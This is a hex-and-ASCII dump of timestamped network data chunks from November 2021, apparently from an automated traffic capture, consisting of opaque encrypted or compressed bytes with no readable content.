                                                                                    2021-11-23 13:40:01 UTC20INData Raw: 76 b4 96 11 6e c1 7e 52 44 5f fa 29 0c 55 fd b7 93 49 28 dc 83 50 9d f6 58 db 2e c1 33 d2 0a 1e 31 5f 29 e1 cd 93 40 ab e5 6d 1d 86 f0 a2 fd f5 25 3e 6d 4a 88 52 ea e7 33 07 67 a8 5d 22 f2 f4 e0 71 32 35 7b 2b b4 b9 15 24 a4 59 b3 c4 5d 6b e7 86 e9 87 31 33 32 b3 aa c6 cb 15 1b 15 7e 0c 91 e5 7f b4 8e d0 70 73 6c 13 10 eb 21 37 d5 f5 de 01 9a fa dc 3a 66 ea 50 1b b6 df 9e ea 7e 6f b1 66 08 96 af 3d 21 91 12 f1 72 f7 28 63 e3 af 4e 3e 91 a0 66 49 5a 2e 85 27 f0 ef 58 74 88 07 74 62 76 da 7c 2c 5d 2f 93 77 66 00 b6 2f 40 97 67 62 f7 22 25 9a ad 1b 08 47 17 c8 e3 8a 35 8e 03 a3 09 66 14 16 b1 11 6a 73 a8 6f 62 53 e2 45 56 df 13 68 cf 03 31 30 17 73 87 92 d1 be 5d 0a 23 ff 85 a4 00 f4 97 13 16 26 a5 cf bb e8 f1 31 ce 79 f1 fd 2c c2 c2 e5 03 e4 a9 dc b2 c9 c3
                                                                                    Data Ascii: vn~RD_)UI(PX.31_)@m%>mJR3g]"q25{+$Y]k132~psl!7:fP~of=!r(cN>fIZ.'Xttbv|,]/wf/@gb"%G5fjsobSEVh10s]#&1y,
                                                                                    2021-11-23 13:40:01 UTC22INData Raw: 51 9b 4d 6a 7e 40 0a 61 13 88 b0 df 05 94 35 92 b7 c1 83 c4 f0 94 80 ee 50 56 51 41 32 b9 0f 17 cd 7d c6 15 46 e3 fe 17 23 72 97 9a 57 90 b4 df ef ca 2a 80 a0 ee 30 a4 67 b2 d1 21 bc 27 5f d1 0f c6 b8 c7 d2 63 e1 42 b9 77 8e 89 ab 0c a4 f7 82 22 16 8f 50 fd 06 05 4f 76 9d 42 79 44 c6 bd ea 98 f1 92 d4 49 4a 85 49 f3 8c 3c f2 23 c0 2f a2 f9 31 84 de 18 07 a9 ec 6d 01 05 b1 9e 4c 80 0b 32 09 e5 d5 b2 b4 df 1c c0 f3 82 26 83 76 8c a0 71 d0 b4 09 d1 8c e3 6c 59 0e 30 5e d0 1c 89 be 60 4c 98 d1 76 7d 41 23 b9 ce 4f 56 ee 32 18 7f cc 95 a1 5a c7 4d e2 92 f2 a8 8d 35 d9 73 9a a6 01 0d cc 5a a3 5b 78 4b d6 ff 24 b5 32 46 81 6f 80 a5 70 5b 7a 7d 44 7a 81 82 d4 f5 2a 8c 0c ee cd a9 41 a3 be a4 8f f6 b2 d4 a0 84 b3 d5 58 c7 f2 81 c8 d9 34 42 15 4c b4 fc 01 33 ea e9
                                                                                    Data Ascii: QMj~@a5PVQA2}F#rW*0g!'_cBw"POvByDIJI<#/1mL2&vqlY0^`Lv}A#OV2ZM5sZ[xK$2Fop[z}Dz*AX4BL3
                                                                                    2021-11-23 13:40:01 UTC23INData Raw: f5 96 03 16 72 a7 e7 d3 e8 39 d6 ce 7e f0 e6 1c c6 d9 7f 07 e4 0a 88 b2 c9 99 2e 15 0b 89 df 58 99 08 e3 67 e1 a8 67 26 03 81 00 10 1d b1 ef 72 44 b8 7e 3f 7d fa df 57 8b db 41 a7 55 57 63 6f 82 3f 55 54 16 b3 36 0f ad 36 c4 0f 10 2c 07 d3 f1 04 c6 25 72 01 9c 5c 6a 56 2a b6 7c 8a 81 8e a3 f1 ba fe 07 cc b3 e7 ae 5c b0 39 ad d7 cb e7 be 92 ff 6f 16 b4 f8 fe 9e ea 19 19 76 d7 1c e7 28 fe d5 50 72 1b db ad 34 4d 3c 33 a3 5c 5a 6a 47 b9 d5 2e b6 09 b4 75 a9 86 d9 6c 33 48 dd 28 31 57 05 84 82 b1 25 f7 87 48 28 30 0d 10 ea f4 40 0c 0c 6f f0 2d 4d 3a f5 a9 87 f1 76 66 07 76 27 0a c8 bd a0 b7 34 84 fb 5c a0 89 14 cb d1 6e b7 d8 37 45 ee 41 92 0b 6b 59 cc df a3 b6 46 51 48 54 a7 3f 48 5e 6e b7 ab 6c e9 1f be 9a a1 4b 57 2a 92 70 9c fe 84 d4 ed 02 e5 50 37 32 ec
                                                                                    Data Ascii: r9~.Xgg&rD~?}WAUWco?UT66,%r\jV*|\9ov(Pr4M<3\ZjG.ul3H(1W%H(0@o-M:vfv'4\n7EAkYFQHT?H^nlKW*pP72
                                                                                    2021-11-23 13:40:01 UTC24INData Raw: be ae 14 91 62 ca 88 7b 9d d5 53 d4 47 ab 8e df 4a 3a 17 4c b0 d4 54 42 ea ed 8a 5d bf 47 ec 72 2c fe 7d 4c 00 d2 ff be 78 44 a8 2a d4 0a d4 65 c8 7b e1 1e d2 51 b3 b6 6c 48 1c 94 7a b5 19 fa 2f 25 fa cd b3 95 7c 48 dc 83 03 43 f5 42 e6 d4 c6 0e d2 2b 70 19 8f 37 c9 32 93 69 84 cd fc 5b 86 f6 d0 be c5 21 34 d3 67 93 74 de db 33 16 1d 8d 06 22 f6 e4 d4 55 04 14 45 b1 b2 92 75 8f 93 52 98 35 56 10 ca 7d 14 bc c9 18 df a4 85 62 cd 9a 0e 03 65 3a cd d0 69 ac b8 ec 52 0a 34 17 38 7b 4e 2d de 9a 8f 29 ae f1 db 2e 4a 5c c5 1b b0 fd 83 b9 7e 69 93 97 53 96 a9 49 36 e3 32 25 40 ca fc 6d 63 e2 5c 3a bd 1f ab c9 1c 3c 81 0b 4e 24 70 dc a0 55 72 74 02 b8 d1 2c 59 4a a0 c3 66 0a a7 67 4a 8a 14 52 d1 60 05 5b b4 bd 40 75 8b c9 f2 a5 35 8e 0d 8d 4c 7b 15 10 b1 47 4b 73
                                                                                    Data Ascii: b{SGJ:LTB]Gr,}LxD*e{QlHz/%|HCB+p72i[!4gt3"UEuR5V}be:iR48{N-).J\~iSI62%@mc\:<N$pUrt,YJfgJR`[@u5L{GKs
                                                                                    2021-11-23 13:40:01 UTC26INData Raw: 75 60 4f 8b aa c7 e5 ad 99 93 40 7c fa 9c 46 62 d3 9d e1 b2 8d e4 0b 31 49 e0 ff 63 0d 7d cd 91 bc 6a 62 45 1b c9 45 8e 8e 72 95 00 ea 6c 12 44 07 c1 a7 d8 21 5a bc 5d 3d 52 66 08 7d a4 f6 d6 dc 0f be b7 f4 f4 c7 f9 cb dd bf a2 ee 26 40 29 0c 34 bb 61 eb 81 7d c0 7b 7c e1 e4 8b 89 f3 b2 b2 1a 9a a5 d1 f9 ee 33 a0 8e 4a 25 a4 61 9c c5 05 75 bc 83 e4 e2 34 93 14 d4 58 62 46 b9 31 a6 e8 ab 6d ae 29 90 2b 2b f5 3b b7 2e 67 4e 07 df 6f e3 9b dd 82 cf 40 e5 8b 4e 3d fa ea 2a f2 92 1b 30 12 ea 9f 38 80 7a ae de 19 77 f8 ec 6d 00 12 ab 8e 73 d8 0c 1e 67 05 d5 b3 b0 f5 1a eb 5f 0c 0d 6d 7c a7 4e 62 e3 81 03 9b 98 e3 6c 3b 0e 30 4f d2 09 0b d9 05 40 be ae 78 35 41 29 90 6f 62 67 ce 1a 29 ce 4a 2d 91 5f c6 df cf ba d4 e5 95 af b1 3d a3 d7 00 7c 81 4d be 77 38 40 e4
                                                                                    Data Ascii: u`O@|Fb1Ic}jbEErlD!Z]=Rf}&@)4a}{|3J%au4XbF1m)++;.gNo@N=*08zwmsg_m|Nbl;0O@x5A)obg)J-_=|Mw8@
                                                                                    2021-11-23 13:40:01 UTC27INData Raw: 5f 4b 09 79 12 41 9b b9 f7 47 1d 12 8c ca 1f 8e 07 a4 27 4e 15 16 bb 39 36 73 d9 65 4a e6 ed 45 50 d9 84 30 c5 05 36 01 ce ad f2 95 f9 35 5f 0a 29 23 93 a4 00 f5 e8 02 16 26 1d ce af e8 74 90 ce 7e f1 fd 2c c2 f7 fd e1 e4 0a da 9f cb 9e 06 6d a8 9b ef 5d e2 68 e3 67 e5 dc 4a 25 34 d9 4d 1b 36 bb fe 72 47 9c 17 af 13 b5 d8 2c 8d ce 6c aa 5b e1 4f 7f af e7 01 79 f9 d7 94 fb aa 5f ef 02 10 26 28 bd d1 19 eb 25 8a 42 95 79 0d 55 26 97 9f af ca f9 82 dd 97 05 18 f0 41 ee 7e d5 b2 56 25 fe 8d e1 c5 94 cc 6d 04 b6 ad d3 9c f6 2d 3d 10 b1 1b ca 33 05 ca 5b 59 c3 ff c0 c1 4a 3e 74 57 5d 5a 66 42 b3 c5 03 a9 0b 07 75 a9 83 c1 07 33 47 d7 f6 31 29 46 84 82 b7 5d 6c ab 4f 08 73 49 6f d3 fe 6a 2e 25 f7 79 2f 7d 36 8e aa 87 f1 72 09 29 77 27 02 f3 8b 85 98 13 bc ba 5c
                                                                                    Data Ascii: _KyAG'N96seJEP065_)#&t~,m]hgJ%4M6rG,l[Oy_&(%ByU&A~V%m-=3[YJ>tW]ZfBu3G1)F]lOsIoj.%y/}6r)w'\
                                                                                    2021-11-23 13:40:02 UTC28INData Raw: 31 5b e0 f7 3a 59 c3 fa b2 d4 38 ca 06 ae 15 c5 b1 64 6b a9 2b db e8 22 7b de ef 04 3d 8d 3e c9 53 c0 d2 15 1e 1c 18 21 1c 1f 80 bb e3 02 a8 09 f0 ea 82 4a e8 e3 d3 15 d1 66 d6 a5 4c 95 f5 1b 69 8f e0 ae ba 2c 5d 70 29 d6 b1 42 54 8f fb a7 7b 99 67 0c ba b8 c7 08 be 66 b8 dc db 1e 23 cd 4c 74 1c f0 bd ee 61 b4 1b f9 1e b9 8e fa b7 ee 9f 71 90 9f f6 04 e3 ec d6 6f 86 65 62 34 8b 5d 59 97 54 eb ab 8a 25 ac 1a 0a 37 4e 2d fe c6 f0 70 dd 71 11 3a df fc b2 e2 cc 78 2d c0 4d 80 48 c2 ef 28 75 78 ea 05 33 f2 e4 dd 7c 0d 6d c7 fa d5 e0 14 1e a2 45 c0 22 78 cf c4 49 d7 9c 71 25 21 b3 a9 78 cd 04 1b 15 fb 30 ba d4 31 bf a5 ee 50 17 15 e3 18 85 51 0d b6 e6 d3 38 a9 fc b2 5c 5d 73 41 1c 9a f7 b8 db 79 69 8b f9 08 96 c2 43 16 80 3a ca 5f e2 09 bd 42 e4 4e 3c bd cd ab
                                                                                    Data Ascii: 1[:Y8dk+"{=>S!JfLi,]p)BT{gf#Ltaqoeb4]YT%7N-pq:x-MH(ux3|mE"xIq%!x01PQ8\]sAyiC:_BN<
                                                                                    2021-11-23 13:40:02 UTC29INData Raw: 40 19 0b 60 18 30 60 0d a8 b4 82 e6 2b 1a 2c 66 21 11 eb f8 e7 9e 35 9e e8 5b b1 8e 2c e0 d2 72 bb b8 ed 48 c5 e2 11 66 61 59 f9 f4 09 a5 42 7a fd 47 a1 0d eb 60 4e ba 35 2a 9c cf a0 b6 75 82 46 2b ff 3d 87 d3 97 d9 83 9f f7 58 4f 14 e0 9f 67 1c 69 ef 07 26 13 2a 1d 7a 48 69 c6 8e 76 85 12 eb 24 25 4e 7f 0a d2 73 2b 71 bc 5f 02 62 51 0d 48 2e f1 c6 dc 0f bb e6 0a ac c4 f8 b0 70 c9 84 ec 3b cb 59 91 bb bb 60 9b e4 3b c0 7a 7d 1d ff 02 f7 26 ef b2 1b 94 94 75 f1 e7 34 c7 26 c8 25 a4 63 a7 dc 2c 45 11 86 db d9 38 ab cd c5 41 7e 52 c7 2c a6 e8 af 2c 3d 71 82 29 5c ef 1f ff 2e 63 5e 7c 86 69 f7 64 c9 b9 16 67 d4 91 aa 14 51 ea 2e ec ac 57 ae 69 e8 87 a6 87 6a ae de 1c 26 d3 f5 6d 01 14 83 89 0d b0 6a 98 12 e5 d5 b7 a7 db 65 c0 89 07 20 0d 2c 8c a0 75 ad de 03
                                                                                    Data Ascii: @`0`+,f!5[,rHfaYBzG`N5*uF+=XOgi&*zHiv$%Ns+q_bQH.p;Y`;z}&u4&%c,E8A~R,,=q)\.c^|idgQ.Wij&mje ,u
                                                                                    2021-11-23 13:40:02 UTC31INData Raw: e3 8e 6b 20 69 99 fc 88 cd a9 43 12 97 01 d5 80 ea 12 4c 4b 6e 4e 3e 9f 57 ba e9 3c 2e 85 62 ef 24 70 d6 88 07 72 96 09 90 7c 26 59 40 88 9a 67 0a a1 66 4c 9d 4c 33 d7 71 02 48 b3 33 f7 52 17 ce 9d 62 30 8e 07 12 63 7a 15 1e bb 39 36 73 a8 65 4a e5 d2 4c 50 f1 04 30 c5 05 39 01 ce af a8 d4 f9 34 57 08 2a 3e 82 ab 26 d3 94 19 9b 04 a7 cf ae ff 51 9a e8 58 db 80 4e c2 d9 d1 2c 08 77 bf b2 c9 8c 07 8b 81 b8 d5 5e ed 05 e3 67 e5 b5 4a 25 27 b4 1d 37 31 97 92 3d 56 ba 15 9c 5a d1 2e 2c 84 eb 4b a3 49 e6 63 6f 84 e1 0b 52 16 ca a7 23 8b 16 a7 2b 15 2d 03 ba c7 18 dd 0e b1 6c c2 17 26 56 2e aa f6 a5 bd b3 ae ce bb 55 7a e4 4c e3 b9 cb ac 34 44 be e1 c7 ee 46 d9 44 f3 ba 8f 15 9d d0 0d 34 34 f1 1a ca 39 d5 d3 5b 5b dc c1 aa fc 6c 2e 33 12 5d 5a 6a 6e aa c9 04 8a
                                                                                    Data Ascii: k iCLKnN>W<.b$pr|&Y@gfLL3qH3Rb0cz96seJLP094W*>&QXN,w^gJ%'71=VZ.,KIcoR#+-l&V.UzL4DFD449[[l.3]Zjn
                                                                                    2021-11-23 13:40:02 UTC32INData Raw: 3a 86 9e 55 fc 0b 18 4f d6 d5 b3 b6 f4 2b e8 87 06 26 8b 5d ba af 71 a8 01 03 d1 9c cb 7d 58 0e 36 75 f8 10 91 db c9 40 be ab 06 7d 3a ac 91 7a 4b 7e f8 19 3e 52 15 95 b9 4d c6 c5 e4 b9 fe e8 8d 4e 4d 70 a3 d3 29 1e cd 4d b8 5c 24 6d e0 cb 0d 1c 38 58 aa 1f bd 87 74 78 1d 7d 44 7a f4 82 c0 a4 00 80 22 ef c7 ba 7a c6 9e a2 13 fd 5c e1 8b 71 98 2d 58 94 52 81 c8 db 5e 38 7a 79 b0 d4 22 ec af c6 a2 11 bf 47 e6 64 84 e0 48 dd 7b cb b9 be 7c 42 88 24 3b da c2 80 37 77 a7 18 fa e3 b3 b6 8d 60 70 60 7a b1 81 e4 24 0f 01 dd 95 bf b1 57 f4 7c 5a 43 f3 51 7c 80 eb 22 f5 23 52 31 5f 23 92 b9 93 69 88 9f 63 5b 87 e0 a3 e6 c5 21 2c c4 45 a9 52 8a a1 33 16 18 f1 6d 27 f6 0a cc 78 14 44 53 a2 a5 bb 09 95 d3 f9 98 31 7c c6 ec 64 d1 ad d9 a9 4b fd 82 73 ca 64 55 03 65 20
                                                                                    Data Ascii: :UO+&]q}X6u@}:zK~>RMNMp)M\$m8Xtx}Dz"z\q-XR^8zy"GdH{|B$;7w`p`z$W|ZCQ|"#R1_#ic[!,ER3m'xDS1|dKsdUe
                                                                                    2021-11-23 13:40:02 UTC33INData Raw: 96 79 ee 08 ea 74 ff 03 45 71 3e d7 86 c7 e8 32 04 04 7c 2d 46 bc af fb d6 be 21 01 d7 af 9f e5 2d 52 62 07 e8 19 d6 46 84 84 17 4c 66 93 68 45 36 cb 70 fb 0b 40 08 08 a2 7f 33 5b 1c 9b 8f 57 ef 5a f6 29 77 21 a2 e8 17 c5 9f 35 90 d1 56 98 7a fd 34 06 d2 dc 93 71 41 d6 7f 6f c4 9e 53 c5 99 5d 49 b9 d1 24 54 a4 22 65 e1 b6 6e 74 a0 f9 55 5e 4d a1 4b 57 3f a0 68 86 6a 9d f2 82 f2 e4 50 20 4b c8 85 62 0d 6a bc e6 27 13 20 5f 36 f8 12 d7 8a 0c ff 1a c7 29 ba f1 7f 39 d2 73 2b 47 90 69 37 15 2b 0a 65 3a 9e 9e 46 12 92 dc 9f 8a ab f8 d1 f4 85 81 76 34 a4 2f 41 34 b1 6c b1 c7 6e c4 51 ba f0 fb 3a 26 55 99 56 65 fd b4 d5 f5 f6 30 d8 cb 95 25 a0 e9 01 b9 63 5f 00 85 55 2b 31 b0 a8 b7 4a 52 48 ae 28 c9 8c aa 0c a4 20 97 46 59 6e 42 f5 00 65 64 74 bc bf f1 9c 36 ba
                                                                                    Data Ascii: ytEq>2|-F!-RbFLfhE6p@3[WZ)w!5Vz4qAoS]I$T"entU^MKW?hjP Kbj' _6)9s+Gi7+e:Fv4/A4lnQ:&UVe0%c_U+1JRH( FYnBedt6
                                                                                    2021-11-23 13:40:02 UTC34INData Raw: 21 52 15 cc bf 0e af 30 aa 03 05 06 03 bb c5 04 c6 23 b7 7a bc 74 a2 56 2a bc 43 a7 a5 b9 81 a6 f3 2e 19 e0 55 ca a7 7c bb 7e ad d6 cb eb ee 9d f2 44 e7 ef 35 fe 9e ea 1c 19 6d d7 18 b1 57 d5 d3 5f 36 53 d7 86 cb 56 19 1d 31 77 60 60 47 5d d8 02 46 29 15 73 bb 81 d9 9e 33 48 dd e5 35 3b 42 ac 16 b5 4a 73 94 49 06 8f 1b 6e d9 e7 45 1a 0b 28 ec 2c 4d 36 a6 f7 87 f1 78 21 bf 77 27 0a ff 91 c7 08 35 94 f1 4e a1 a1 98 cb f9 58 9a 50 79 2a 77 40 91 31 6b 87 fa d6 8b 3c 46 51 42 88 a2 0c 5c 63 48 91 89 aa d4 cf c6 c9 5e 4c 57 2c 90 6d 85 e3 97 f2 8d 8b e4 50 31 49 e0 9f 61 11 71 e2 80 00 3b 4c 44 1b c2 1e e0 a5 85 94 19 f7 24 34 53 10 5b d3 73 21 5a bd 49 39 2a 40 0a 6f 3c 8c 8e f1 0c 99 e0 93 89 a8 f8 d1 f4 bf 7c ec 3f da 43 71 32 bb 06 9a cc 7d d3 7a 77 f2 fd
                                                                                    Data Ascii: !R0#ztV*C.U|~D5mW_6SV1w``G]F)s3H5;BJsInE(,M6x!w'5NXPy*w@1k<FQB\cH^LW,mP1Iaq;LD$4S[s!ZI9*@o<|?Cq2}zw
                                                                                    2021-11-23 13:40:02 UTC35INData Raw: eb db aa b8 6b 6f e4 86 5e 43 f5 40 fc e3 18 31 f1 20 fd 3f 5b 38 e4 57 fc 1c 83 e5 43 4e ab fc 85 f7 c1 4e 48 c5 4a 82 7e b7 cc 37 05 1d c9 ac 33 f2 ca bb 79 14 38 46 8f b7 9f 34 0b b4 56 b3 31 03 a8 c1 56 f3 be ca 5c 4a b4 82 79 d7 38 71 25 1b 52 bc c3 6d a5 cc 8c 57 0d 2c 1a 55 f9 4e 2d d4 ff d4 29 ae d3 dc 3c 4e 32 50 1b b0 82 ab eb 7e fa 99 f8 08 27 a9 43 16 5e 12 f5 5e 0f 03 6d 63 ef 4f 3e 95 a2 aa c9 16 69 84 23 db 41 71 d6 88 84 73 74 08 0c 7d 2c 59 fa 89 76 66 d2 a0 76 4c 6b 4d 41 d7 52 01 4a b3 b7 f5 47 17 65 9f c0 35 6e 05 a5 66 4d 16 16 bb 12 35 7e 83 f7 72 a0 e1 45 50 a7 77 30 c5 01 37 05 df a8 1a ec d9 34 5d 0b 58 03 af a4 01 9a e4 02 16 2c 9f e7 ac e8 7c ee bd 7e f1 f9 22 c6 c8 d0 9d 9d 28 dc b2 c8 f9 0e 7a 82 89 b0 2d e3 05 e9 5f ef b6 4a
                                                                                    Data Ascii: ko^C@1 ?[8WCNNHJ~73y8F4V1V\Jy8q%RmW,UN-)<N2P~'C^^mcO>i#Aqst},YvfvLkMARJGe5nfM5~rEPw074]X,|~"(z-_J
                                                                                    2021-11-23 13:40:02 UTC36INData Raw: b5 ed bd e7 cf d3 3d 8e ec 84 ec 3b d8 46 43 ba 0c 0f 40 cc 7d ca 64 5a c9 d8 13 8e 9f b2 b2 11 8d 99 f3 d7 99 46 a6 a6 91 56 6c 67 b6 dc 1b 73 1f a9 b1 56 39 b8 c3 bb c4 53 42 b3 48 22 e8 ab 0c 85 3d 7f 22 3d 6f 69 2e ae 15 4f 76 93 44 37 1a b9 af e8 62 cc 47 aa 38 51 ea 2e 9c 45 36 2e 3e ff aa ed df 49 dc de 18 02 a3 fa 1e 8c 04 86 94 4f fd 48 3e 5e e0 c2 ea a1 87 9b e2 88 07 27 96 5b b4 86 60 d7 8d 15 d8 16 54 03 c9 0f 30 54 f6 0e 95 cf 34 40 be a5 00 0e 86 29 91 70 54 7b f5 3e 40 26 3e 86 95 2c 0f c5 e2 98 72 96 8d 35 cc 5b b1 c4 04 26 62 5e ba 5d 9e 60 d5 1a a5 c7 38 58 a8 1e 7b a5 72 86 6f 4e 44 7a 83 90 c2 cb 73 a8 0d ea a8 2d 6d ea 92 f9 97 d1 62 ce 9a 79 cd a4 5e ef 43 ee 59 de 4a 31 68 cf b0 d4 20 4c 9b e3 8a 59 d0 c8 ed 72 a2 c7 e0 d8 00 de ab
                                                                                    Data Ascii: =;FC@}dZFVlgsV9SBH"="=oi.OvD7bG8Q.E6.>IOH>^'[`T0T4@)pT{>@&>,r5[&b^]`8X{roNDzs-mby^CYJ1h LYr
                                                                                    2021-11-23 13:40:02 UTC38INData Raw: f6 e1 01 dc ff f3 05 9a 16 dc b2 cd f6 31 7a 82 8c f7 00 e3 05 e5 71 c9 a5 6c 2c 08 b5 28 17 3d 9a 34 22 43 ba 11 b2 57 27 d4 07 69 fb 7c 88 ad f8 4b 90 84 e1 0d 21 60 dc bf 04 d7 43 e7 03 10 26 14 91 d8 22 cf 4c 0a 4b b9 7e 30 cc 33 91 73 81 a3 c7 24 dc 9d 24 0a ed 5a f4 a6 62 6c 56 24 d6 c7 ca 24 94 d4 85 03 95 b5 f6 04 f3 02 e4 6c f1 1a cb 11 93 d3 5b 53 d0 d2 e9 69 4b 34 11 78 f5 5b 6c 66 9d c2 21 b9 52 23 75 a9 86 9e 56 33 48 dd ce 93 29 46 84 52 a0 4a 79 87 60 68 1c 1b 64 c2 f1 2f a0 0f 00 73 43 e4 3d 8e af ab e0 7a 0e 5a 4f 27 00 e8 f8 f3 9f 35 9e c3 25 a0 89 00 1b ef 52 b7 92 59 03 ee 40 9b 2a 64 36 55 de a3 bc 29 f8 49 54 ae 0a 53 7b 4f e2 ae ab c1 c9 cf e9 5e 4b 5d 07 c3 bd 92 d3 9d f3 aa cd e4 50 3b 58 e5 f0 cb 0c 6c c5 e8 8f 12 2a 4f 37 c6 3c
                                                                                    Data Ascii: 1zql,(=4"CW'i|K!`C&"LK~03s$$ZblV$$l[SiK4x[lf!R#uV3H)FRJy`hd/sC=zZO'5%RY@*d6U)ITS{O^K]P;Xl*O7<
                                                                                    2021-11-23 13:40:02 UTC39INData Raw: 7e c8 df 4c 2d 99 6c b0 d4 25 1a b9 e2 8a 5b c6 67 ec 72 a9 8f 4e db 00 df 93 ad 48 47 a8 0a 11 0a dc a3 c8 77 b6 3e 06 7e 63 a8 a3 b7 11 60 7c ac d3 da 2f 24 e0 d5 e4 94 61 4f a5 a3 5a 43 f4 22 d0 c8 eb 23 de 18 3e 33 5f 09 e1 cd 93 62 82 e5 58 7b 49 de 73 f8 ed de 3e c4 4c 9e de 80 e7 33 17 31 b1 5c 22 f0 9b ec 78 14 33 22 82 b4 b9 1e 25 b4 62 9a 31 5d de c1 56 fc af ce 22 12 51 ac a3 d5 3d e2 03 65 27 aa 4f 49 ac a3 fe 7e 5e 27 13 16 96 6e 2d d4 f4 a5 09 ae fb dd 16 5d 44 52 1b 90 f7 ab eb 72 69 99 e9 28 0c 87 93 08 b9 ed f5 5e e4 15 e1 2f e4 4e 3f bd d8 aa c9 10 57 c9 23 db 25 01 9a 88 07 73 5e 1b a0 7e 2c 7d 40 88 76 6a 0a a1 67 6c 16 62 91 c9 59 fc 4a b3 35 d7 e7 18 ce 9d 4c 79 8e 07 a4 4e 29 14 16 bd 40 7a 73 a8 64 3b aa e2 45 51 f3 17 00 c7 05 1d
                                                                                    Data Ascii: ~L-l%[grNHGw>~c`|/$aOZC"#>3_bX{Is>L31\"x3"%b1]V"Q=e'OI~^'n-]DRri(^/N?W#%s^~,}@vjglbYJ5LyN)@zsd;EQ
                                                                                    2021-11-23 13:40:02 UTC40INData Raw: bf bd 98 fb 62 f2 82 8d cc e4 31 49 e6 89 69 25 0d cf 87 2c cd 2a 43 31 07 34 c7 9e 72 94 1a c7 2d 34 00 56 5b f1 35 21 5a bc 50 21 68 40 4b 65 3e 8f 13 dc 0f ae ee e1 f5 c7 fe f9 a9 95 84 ea 25 f7 53 67 ea 94 6a b1 37 58 e8 36 77 e3 f4 07 d1 45 94 b5 3b b8 9b 05 ef cf cb a6 a6 93 0d 10 67 b6 d0 17 49 2d 84 e9 0f 58 b8 c7 de 95 54 49 92 90 ac c3 58 0a 84 02 50 22 3c 7f 42 ff 2e 67 4f 76 84 7c e3 b6 8e af e8 67 f4 ac d3 49 6f ea 2a f3 05 36 2e 25 fe 91 b4 8a 8f af de 12 13 98 c1 4b 09 6a 3f 9f 55 da 1c 41 58 bd 58 91 b6 df 17 d6 a4 1a 00 85 71 9a cf cb d2 84 09 cb 8c f7 78 5e 18 43 e5 d1 1f 9b d3 f1 41 be a5 23 71 6a f8 9a 51 ae 56 e8 0b 0e 50 3e ad 91 5f c7 c4 e2 92 e3 e5 e2 88 c9 70 a9 c0 58 1a 94 c0 9c 76 24 6c e3 f1 33 93 3a 5e ba 5a 18 b6 70 72 04 fc
                                                                                    Data Ascii: b1Ii%,*C14r-4V[5!ZP!h@Ke>%Sgj7X6wE;gI-XTIXP"<B.gOv|gIo*6.%Kj?UAXXqx^CA#qjQVP>_pXv$l3:^Zpr
                                                                                    2021-11-23 13:40:02 UTC42INData Raw: c0 24 8c 2f e4 66 7a 1f 14 ac 2c 0c ca a8 65 4a c0 c4 47 70 26 fb 30 c5 13 00 b4 ce ad 80 b3 df 36 7d 0a 29 83 af ba 3a 44 96 03 16 00 81 cd 8f e8 7c 30 ce 03 51 fd 2c c6 db f5 c3 ed 0a dc cf 68 88 2c 7e 80 a8 9f 41 e2 05 9e c5 e5 b5 4e 27 56 eb 03 1a 3c 99 bb 5f 56 b0 6c 0c 7c fa dd 2e 84 a6 ec a3 7d e2 61 47 49 e0 0b 58 1e ce bf f0 bb 78 bf 03 11 43 56 bc c5 0e bb 89 ac 4a bd 76 31 2b 82 bc 67 a3 a7 ab ec 13 9c 2e 13 90 2b e7 ae 5b dd 99 25 d6 c1 30 b8 38 ff 6f 16 9e a0 83 02 e0 07 30 7d f4 67 57 39 d5 d7 59 57 c5 aa 18 c1 4a 30 19 19 59 27 f3 6c b1 d7 2b d1 b7 06 75 af 82 f2 62 ae 49 d7 f0 1b 54 da 84 82 b1 72 46 79 b7 d1 61 86 6e d3 f0 78 4b f1 ff 86 51 d3 3c 8e a1 bf b6 8d f6 d6 77 27 00 ed a7 a1 9f 2a 94 fb 5c a0 89 00 cb fb 50 cc 07 71 45 ea 43 b9
                                                                                    Data Ascii: $/fz,eJGp&06}):D|0Q,h,~AN'V<_Vl|.}aGIXxCVJv1+g.+[%08o0}gW9YWJ0Y'l+ubITrFyanxKQ<w'*\PqEC
                                                                                    2021-11-23 13:40:02 UTC43INData Raw: 37 70 a3 d1 72 79 cc 4d b4 0c 26 6e e3 f1 26 93 1e 72 d1 95 a6 b7 74 53 82 7d 57 4a 82 82 cf b5 02 a8 01 ee c7 ad 6e f7 83 a9 12 f7 19 6b 88 7b b7 ff 78 c4 b0 81 cb ef 43 3b 1a 4c b0 d4 24 32 ea e3 88 5e a9 6b ef 54 8e d4 13 7a 00 de bd 95 80 45 bb 1a 12 0a d3 a8 c8 77 ab 1e d2 41 b1 a1 9d 64 16 46 01 19 5f fa 2b 0e c7 d6 40 95 62 79 d5 83 55 43 f5 53 f0 c8 eb 22 f6 08 1b 1c 5c 0f c7 e7 ee cb 82 e5 4d 70 7e f0 b0 d6 c6 21 31 c4 4a 88 c2 a0 e7 22 14 02 f9 70 25 d0 99 6f 78 14 36 79 84 9f 4e 1f 0c 97 5b 98 3e 7d de c1 56 f7 af ce 31 31 ae af 70 ed 33 37 7e c6 21 bc c7 42 54 a3 ec 66 09 26 3e 10 ef 4e bc d4 f5 c5 2b b2 e6 f1 36 68 0f f4 1b b0 f3 87 ff 55 6a bf d3 fc 94 b2 55 3a 96 34 8e fa e2 03 69 49 c2 65 c9 eb 5b aa c9 1c 38 f6 f2 da 24 7a fc 88 07 72 67
                                                                                    Data Ascii: 7pryM&n&rtS}WJnk{xC;L$2^kTzEwAdF_+@byUCS"\Mp~!1J"p%ox6yN[>}V11p37~!BTf&>N+6hUjU:4iIe[8$zrg
                                                                                    2021-11-23 13:40:02 UTC44INData Raw: 0f 46 42 27 00 e4 8f 9b ba 1e 97 f1 77 52 8b 7b 5f f9 52 b3 80 75 54 ea 6c 9b 2a 65 5b fe d9 cc 76 47 51 4e 56 a2 22 32 e9 49 91 8d 74 82 c7 b7 ea 52 43 5e a2 27 5f 47 f3 f4 c2 52 95 cc af 31 49 e6 ec 17 0d 6c c5 fd 03 3b 66 45 1b c2 3f c4 f5 e9 94 1a c3 3e 31 57 15 77 da 62 24 58 ba 24 dd 6a 40 0c 67 51 2c 9a dc 09 97 a7 b9 f4 cd 26 d1 da 95 94 ec 3f da 50 41 34 d5 0e 9a e5 3b c0 7a 76 f8 ce 14 fd e1 b2 b2 1b 06 b4 d5 e0 e5 2c b1 ba e6 fc a5 67 bc c0 2d 6e 26 a9 cd 5c 94 b8 c7 d0 5c 44 31 63 70 a6 e2 c4 d7 af 29 8b 2b 46 df 42 ff 2a 64 4b 05 46 6e e3 90 a7 73 e9 66 ed 9f fc 48 51 ea 2c df 9b 1d 29 49 45 87 a2 fd 1c 65 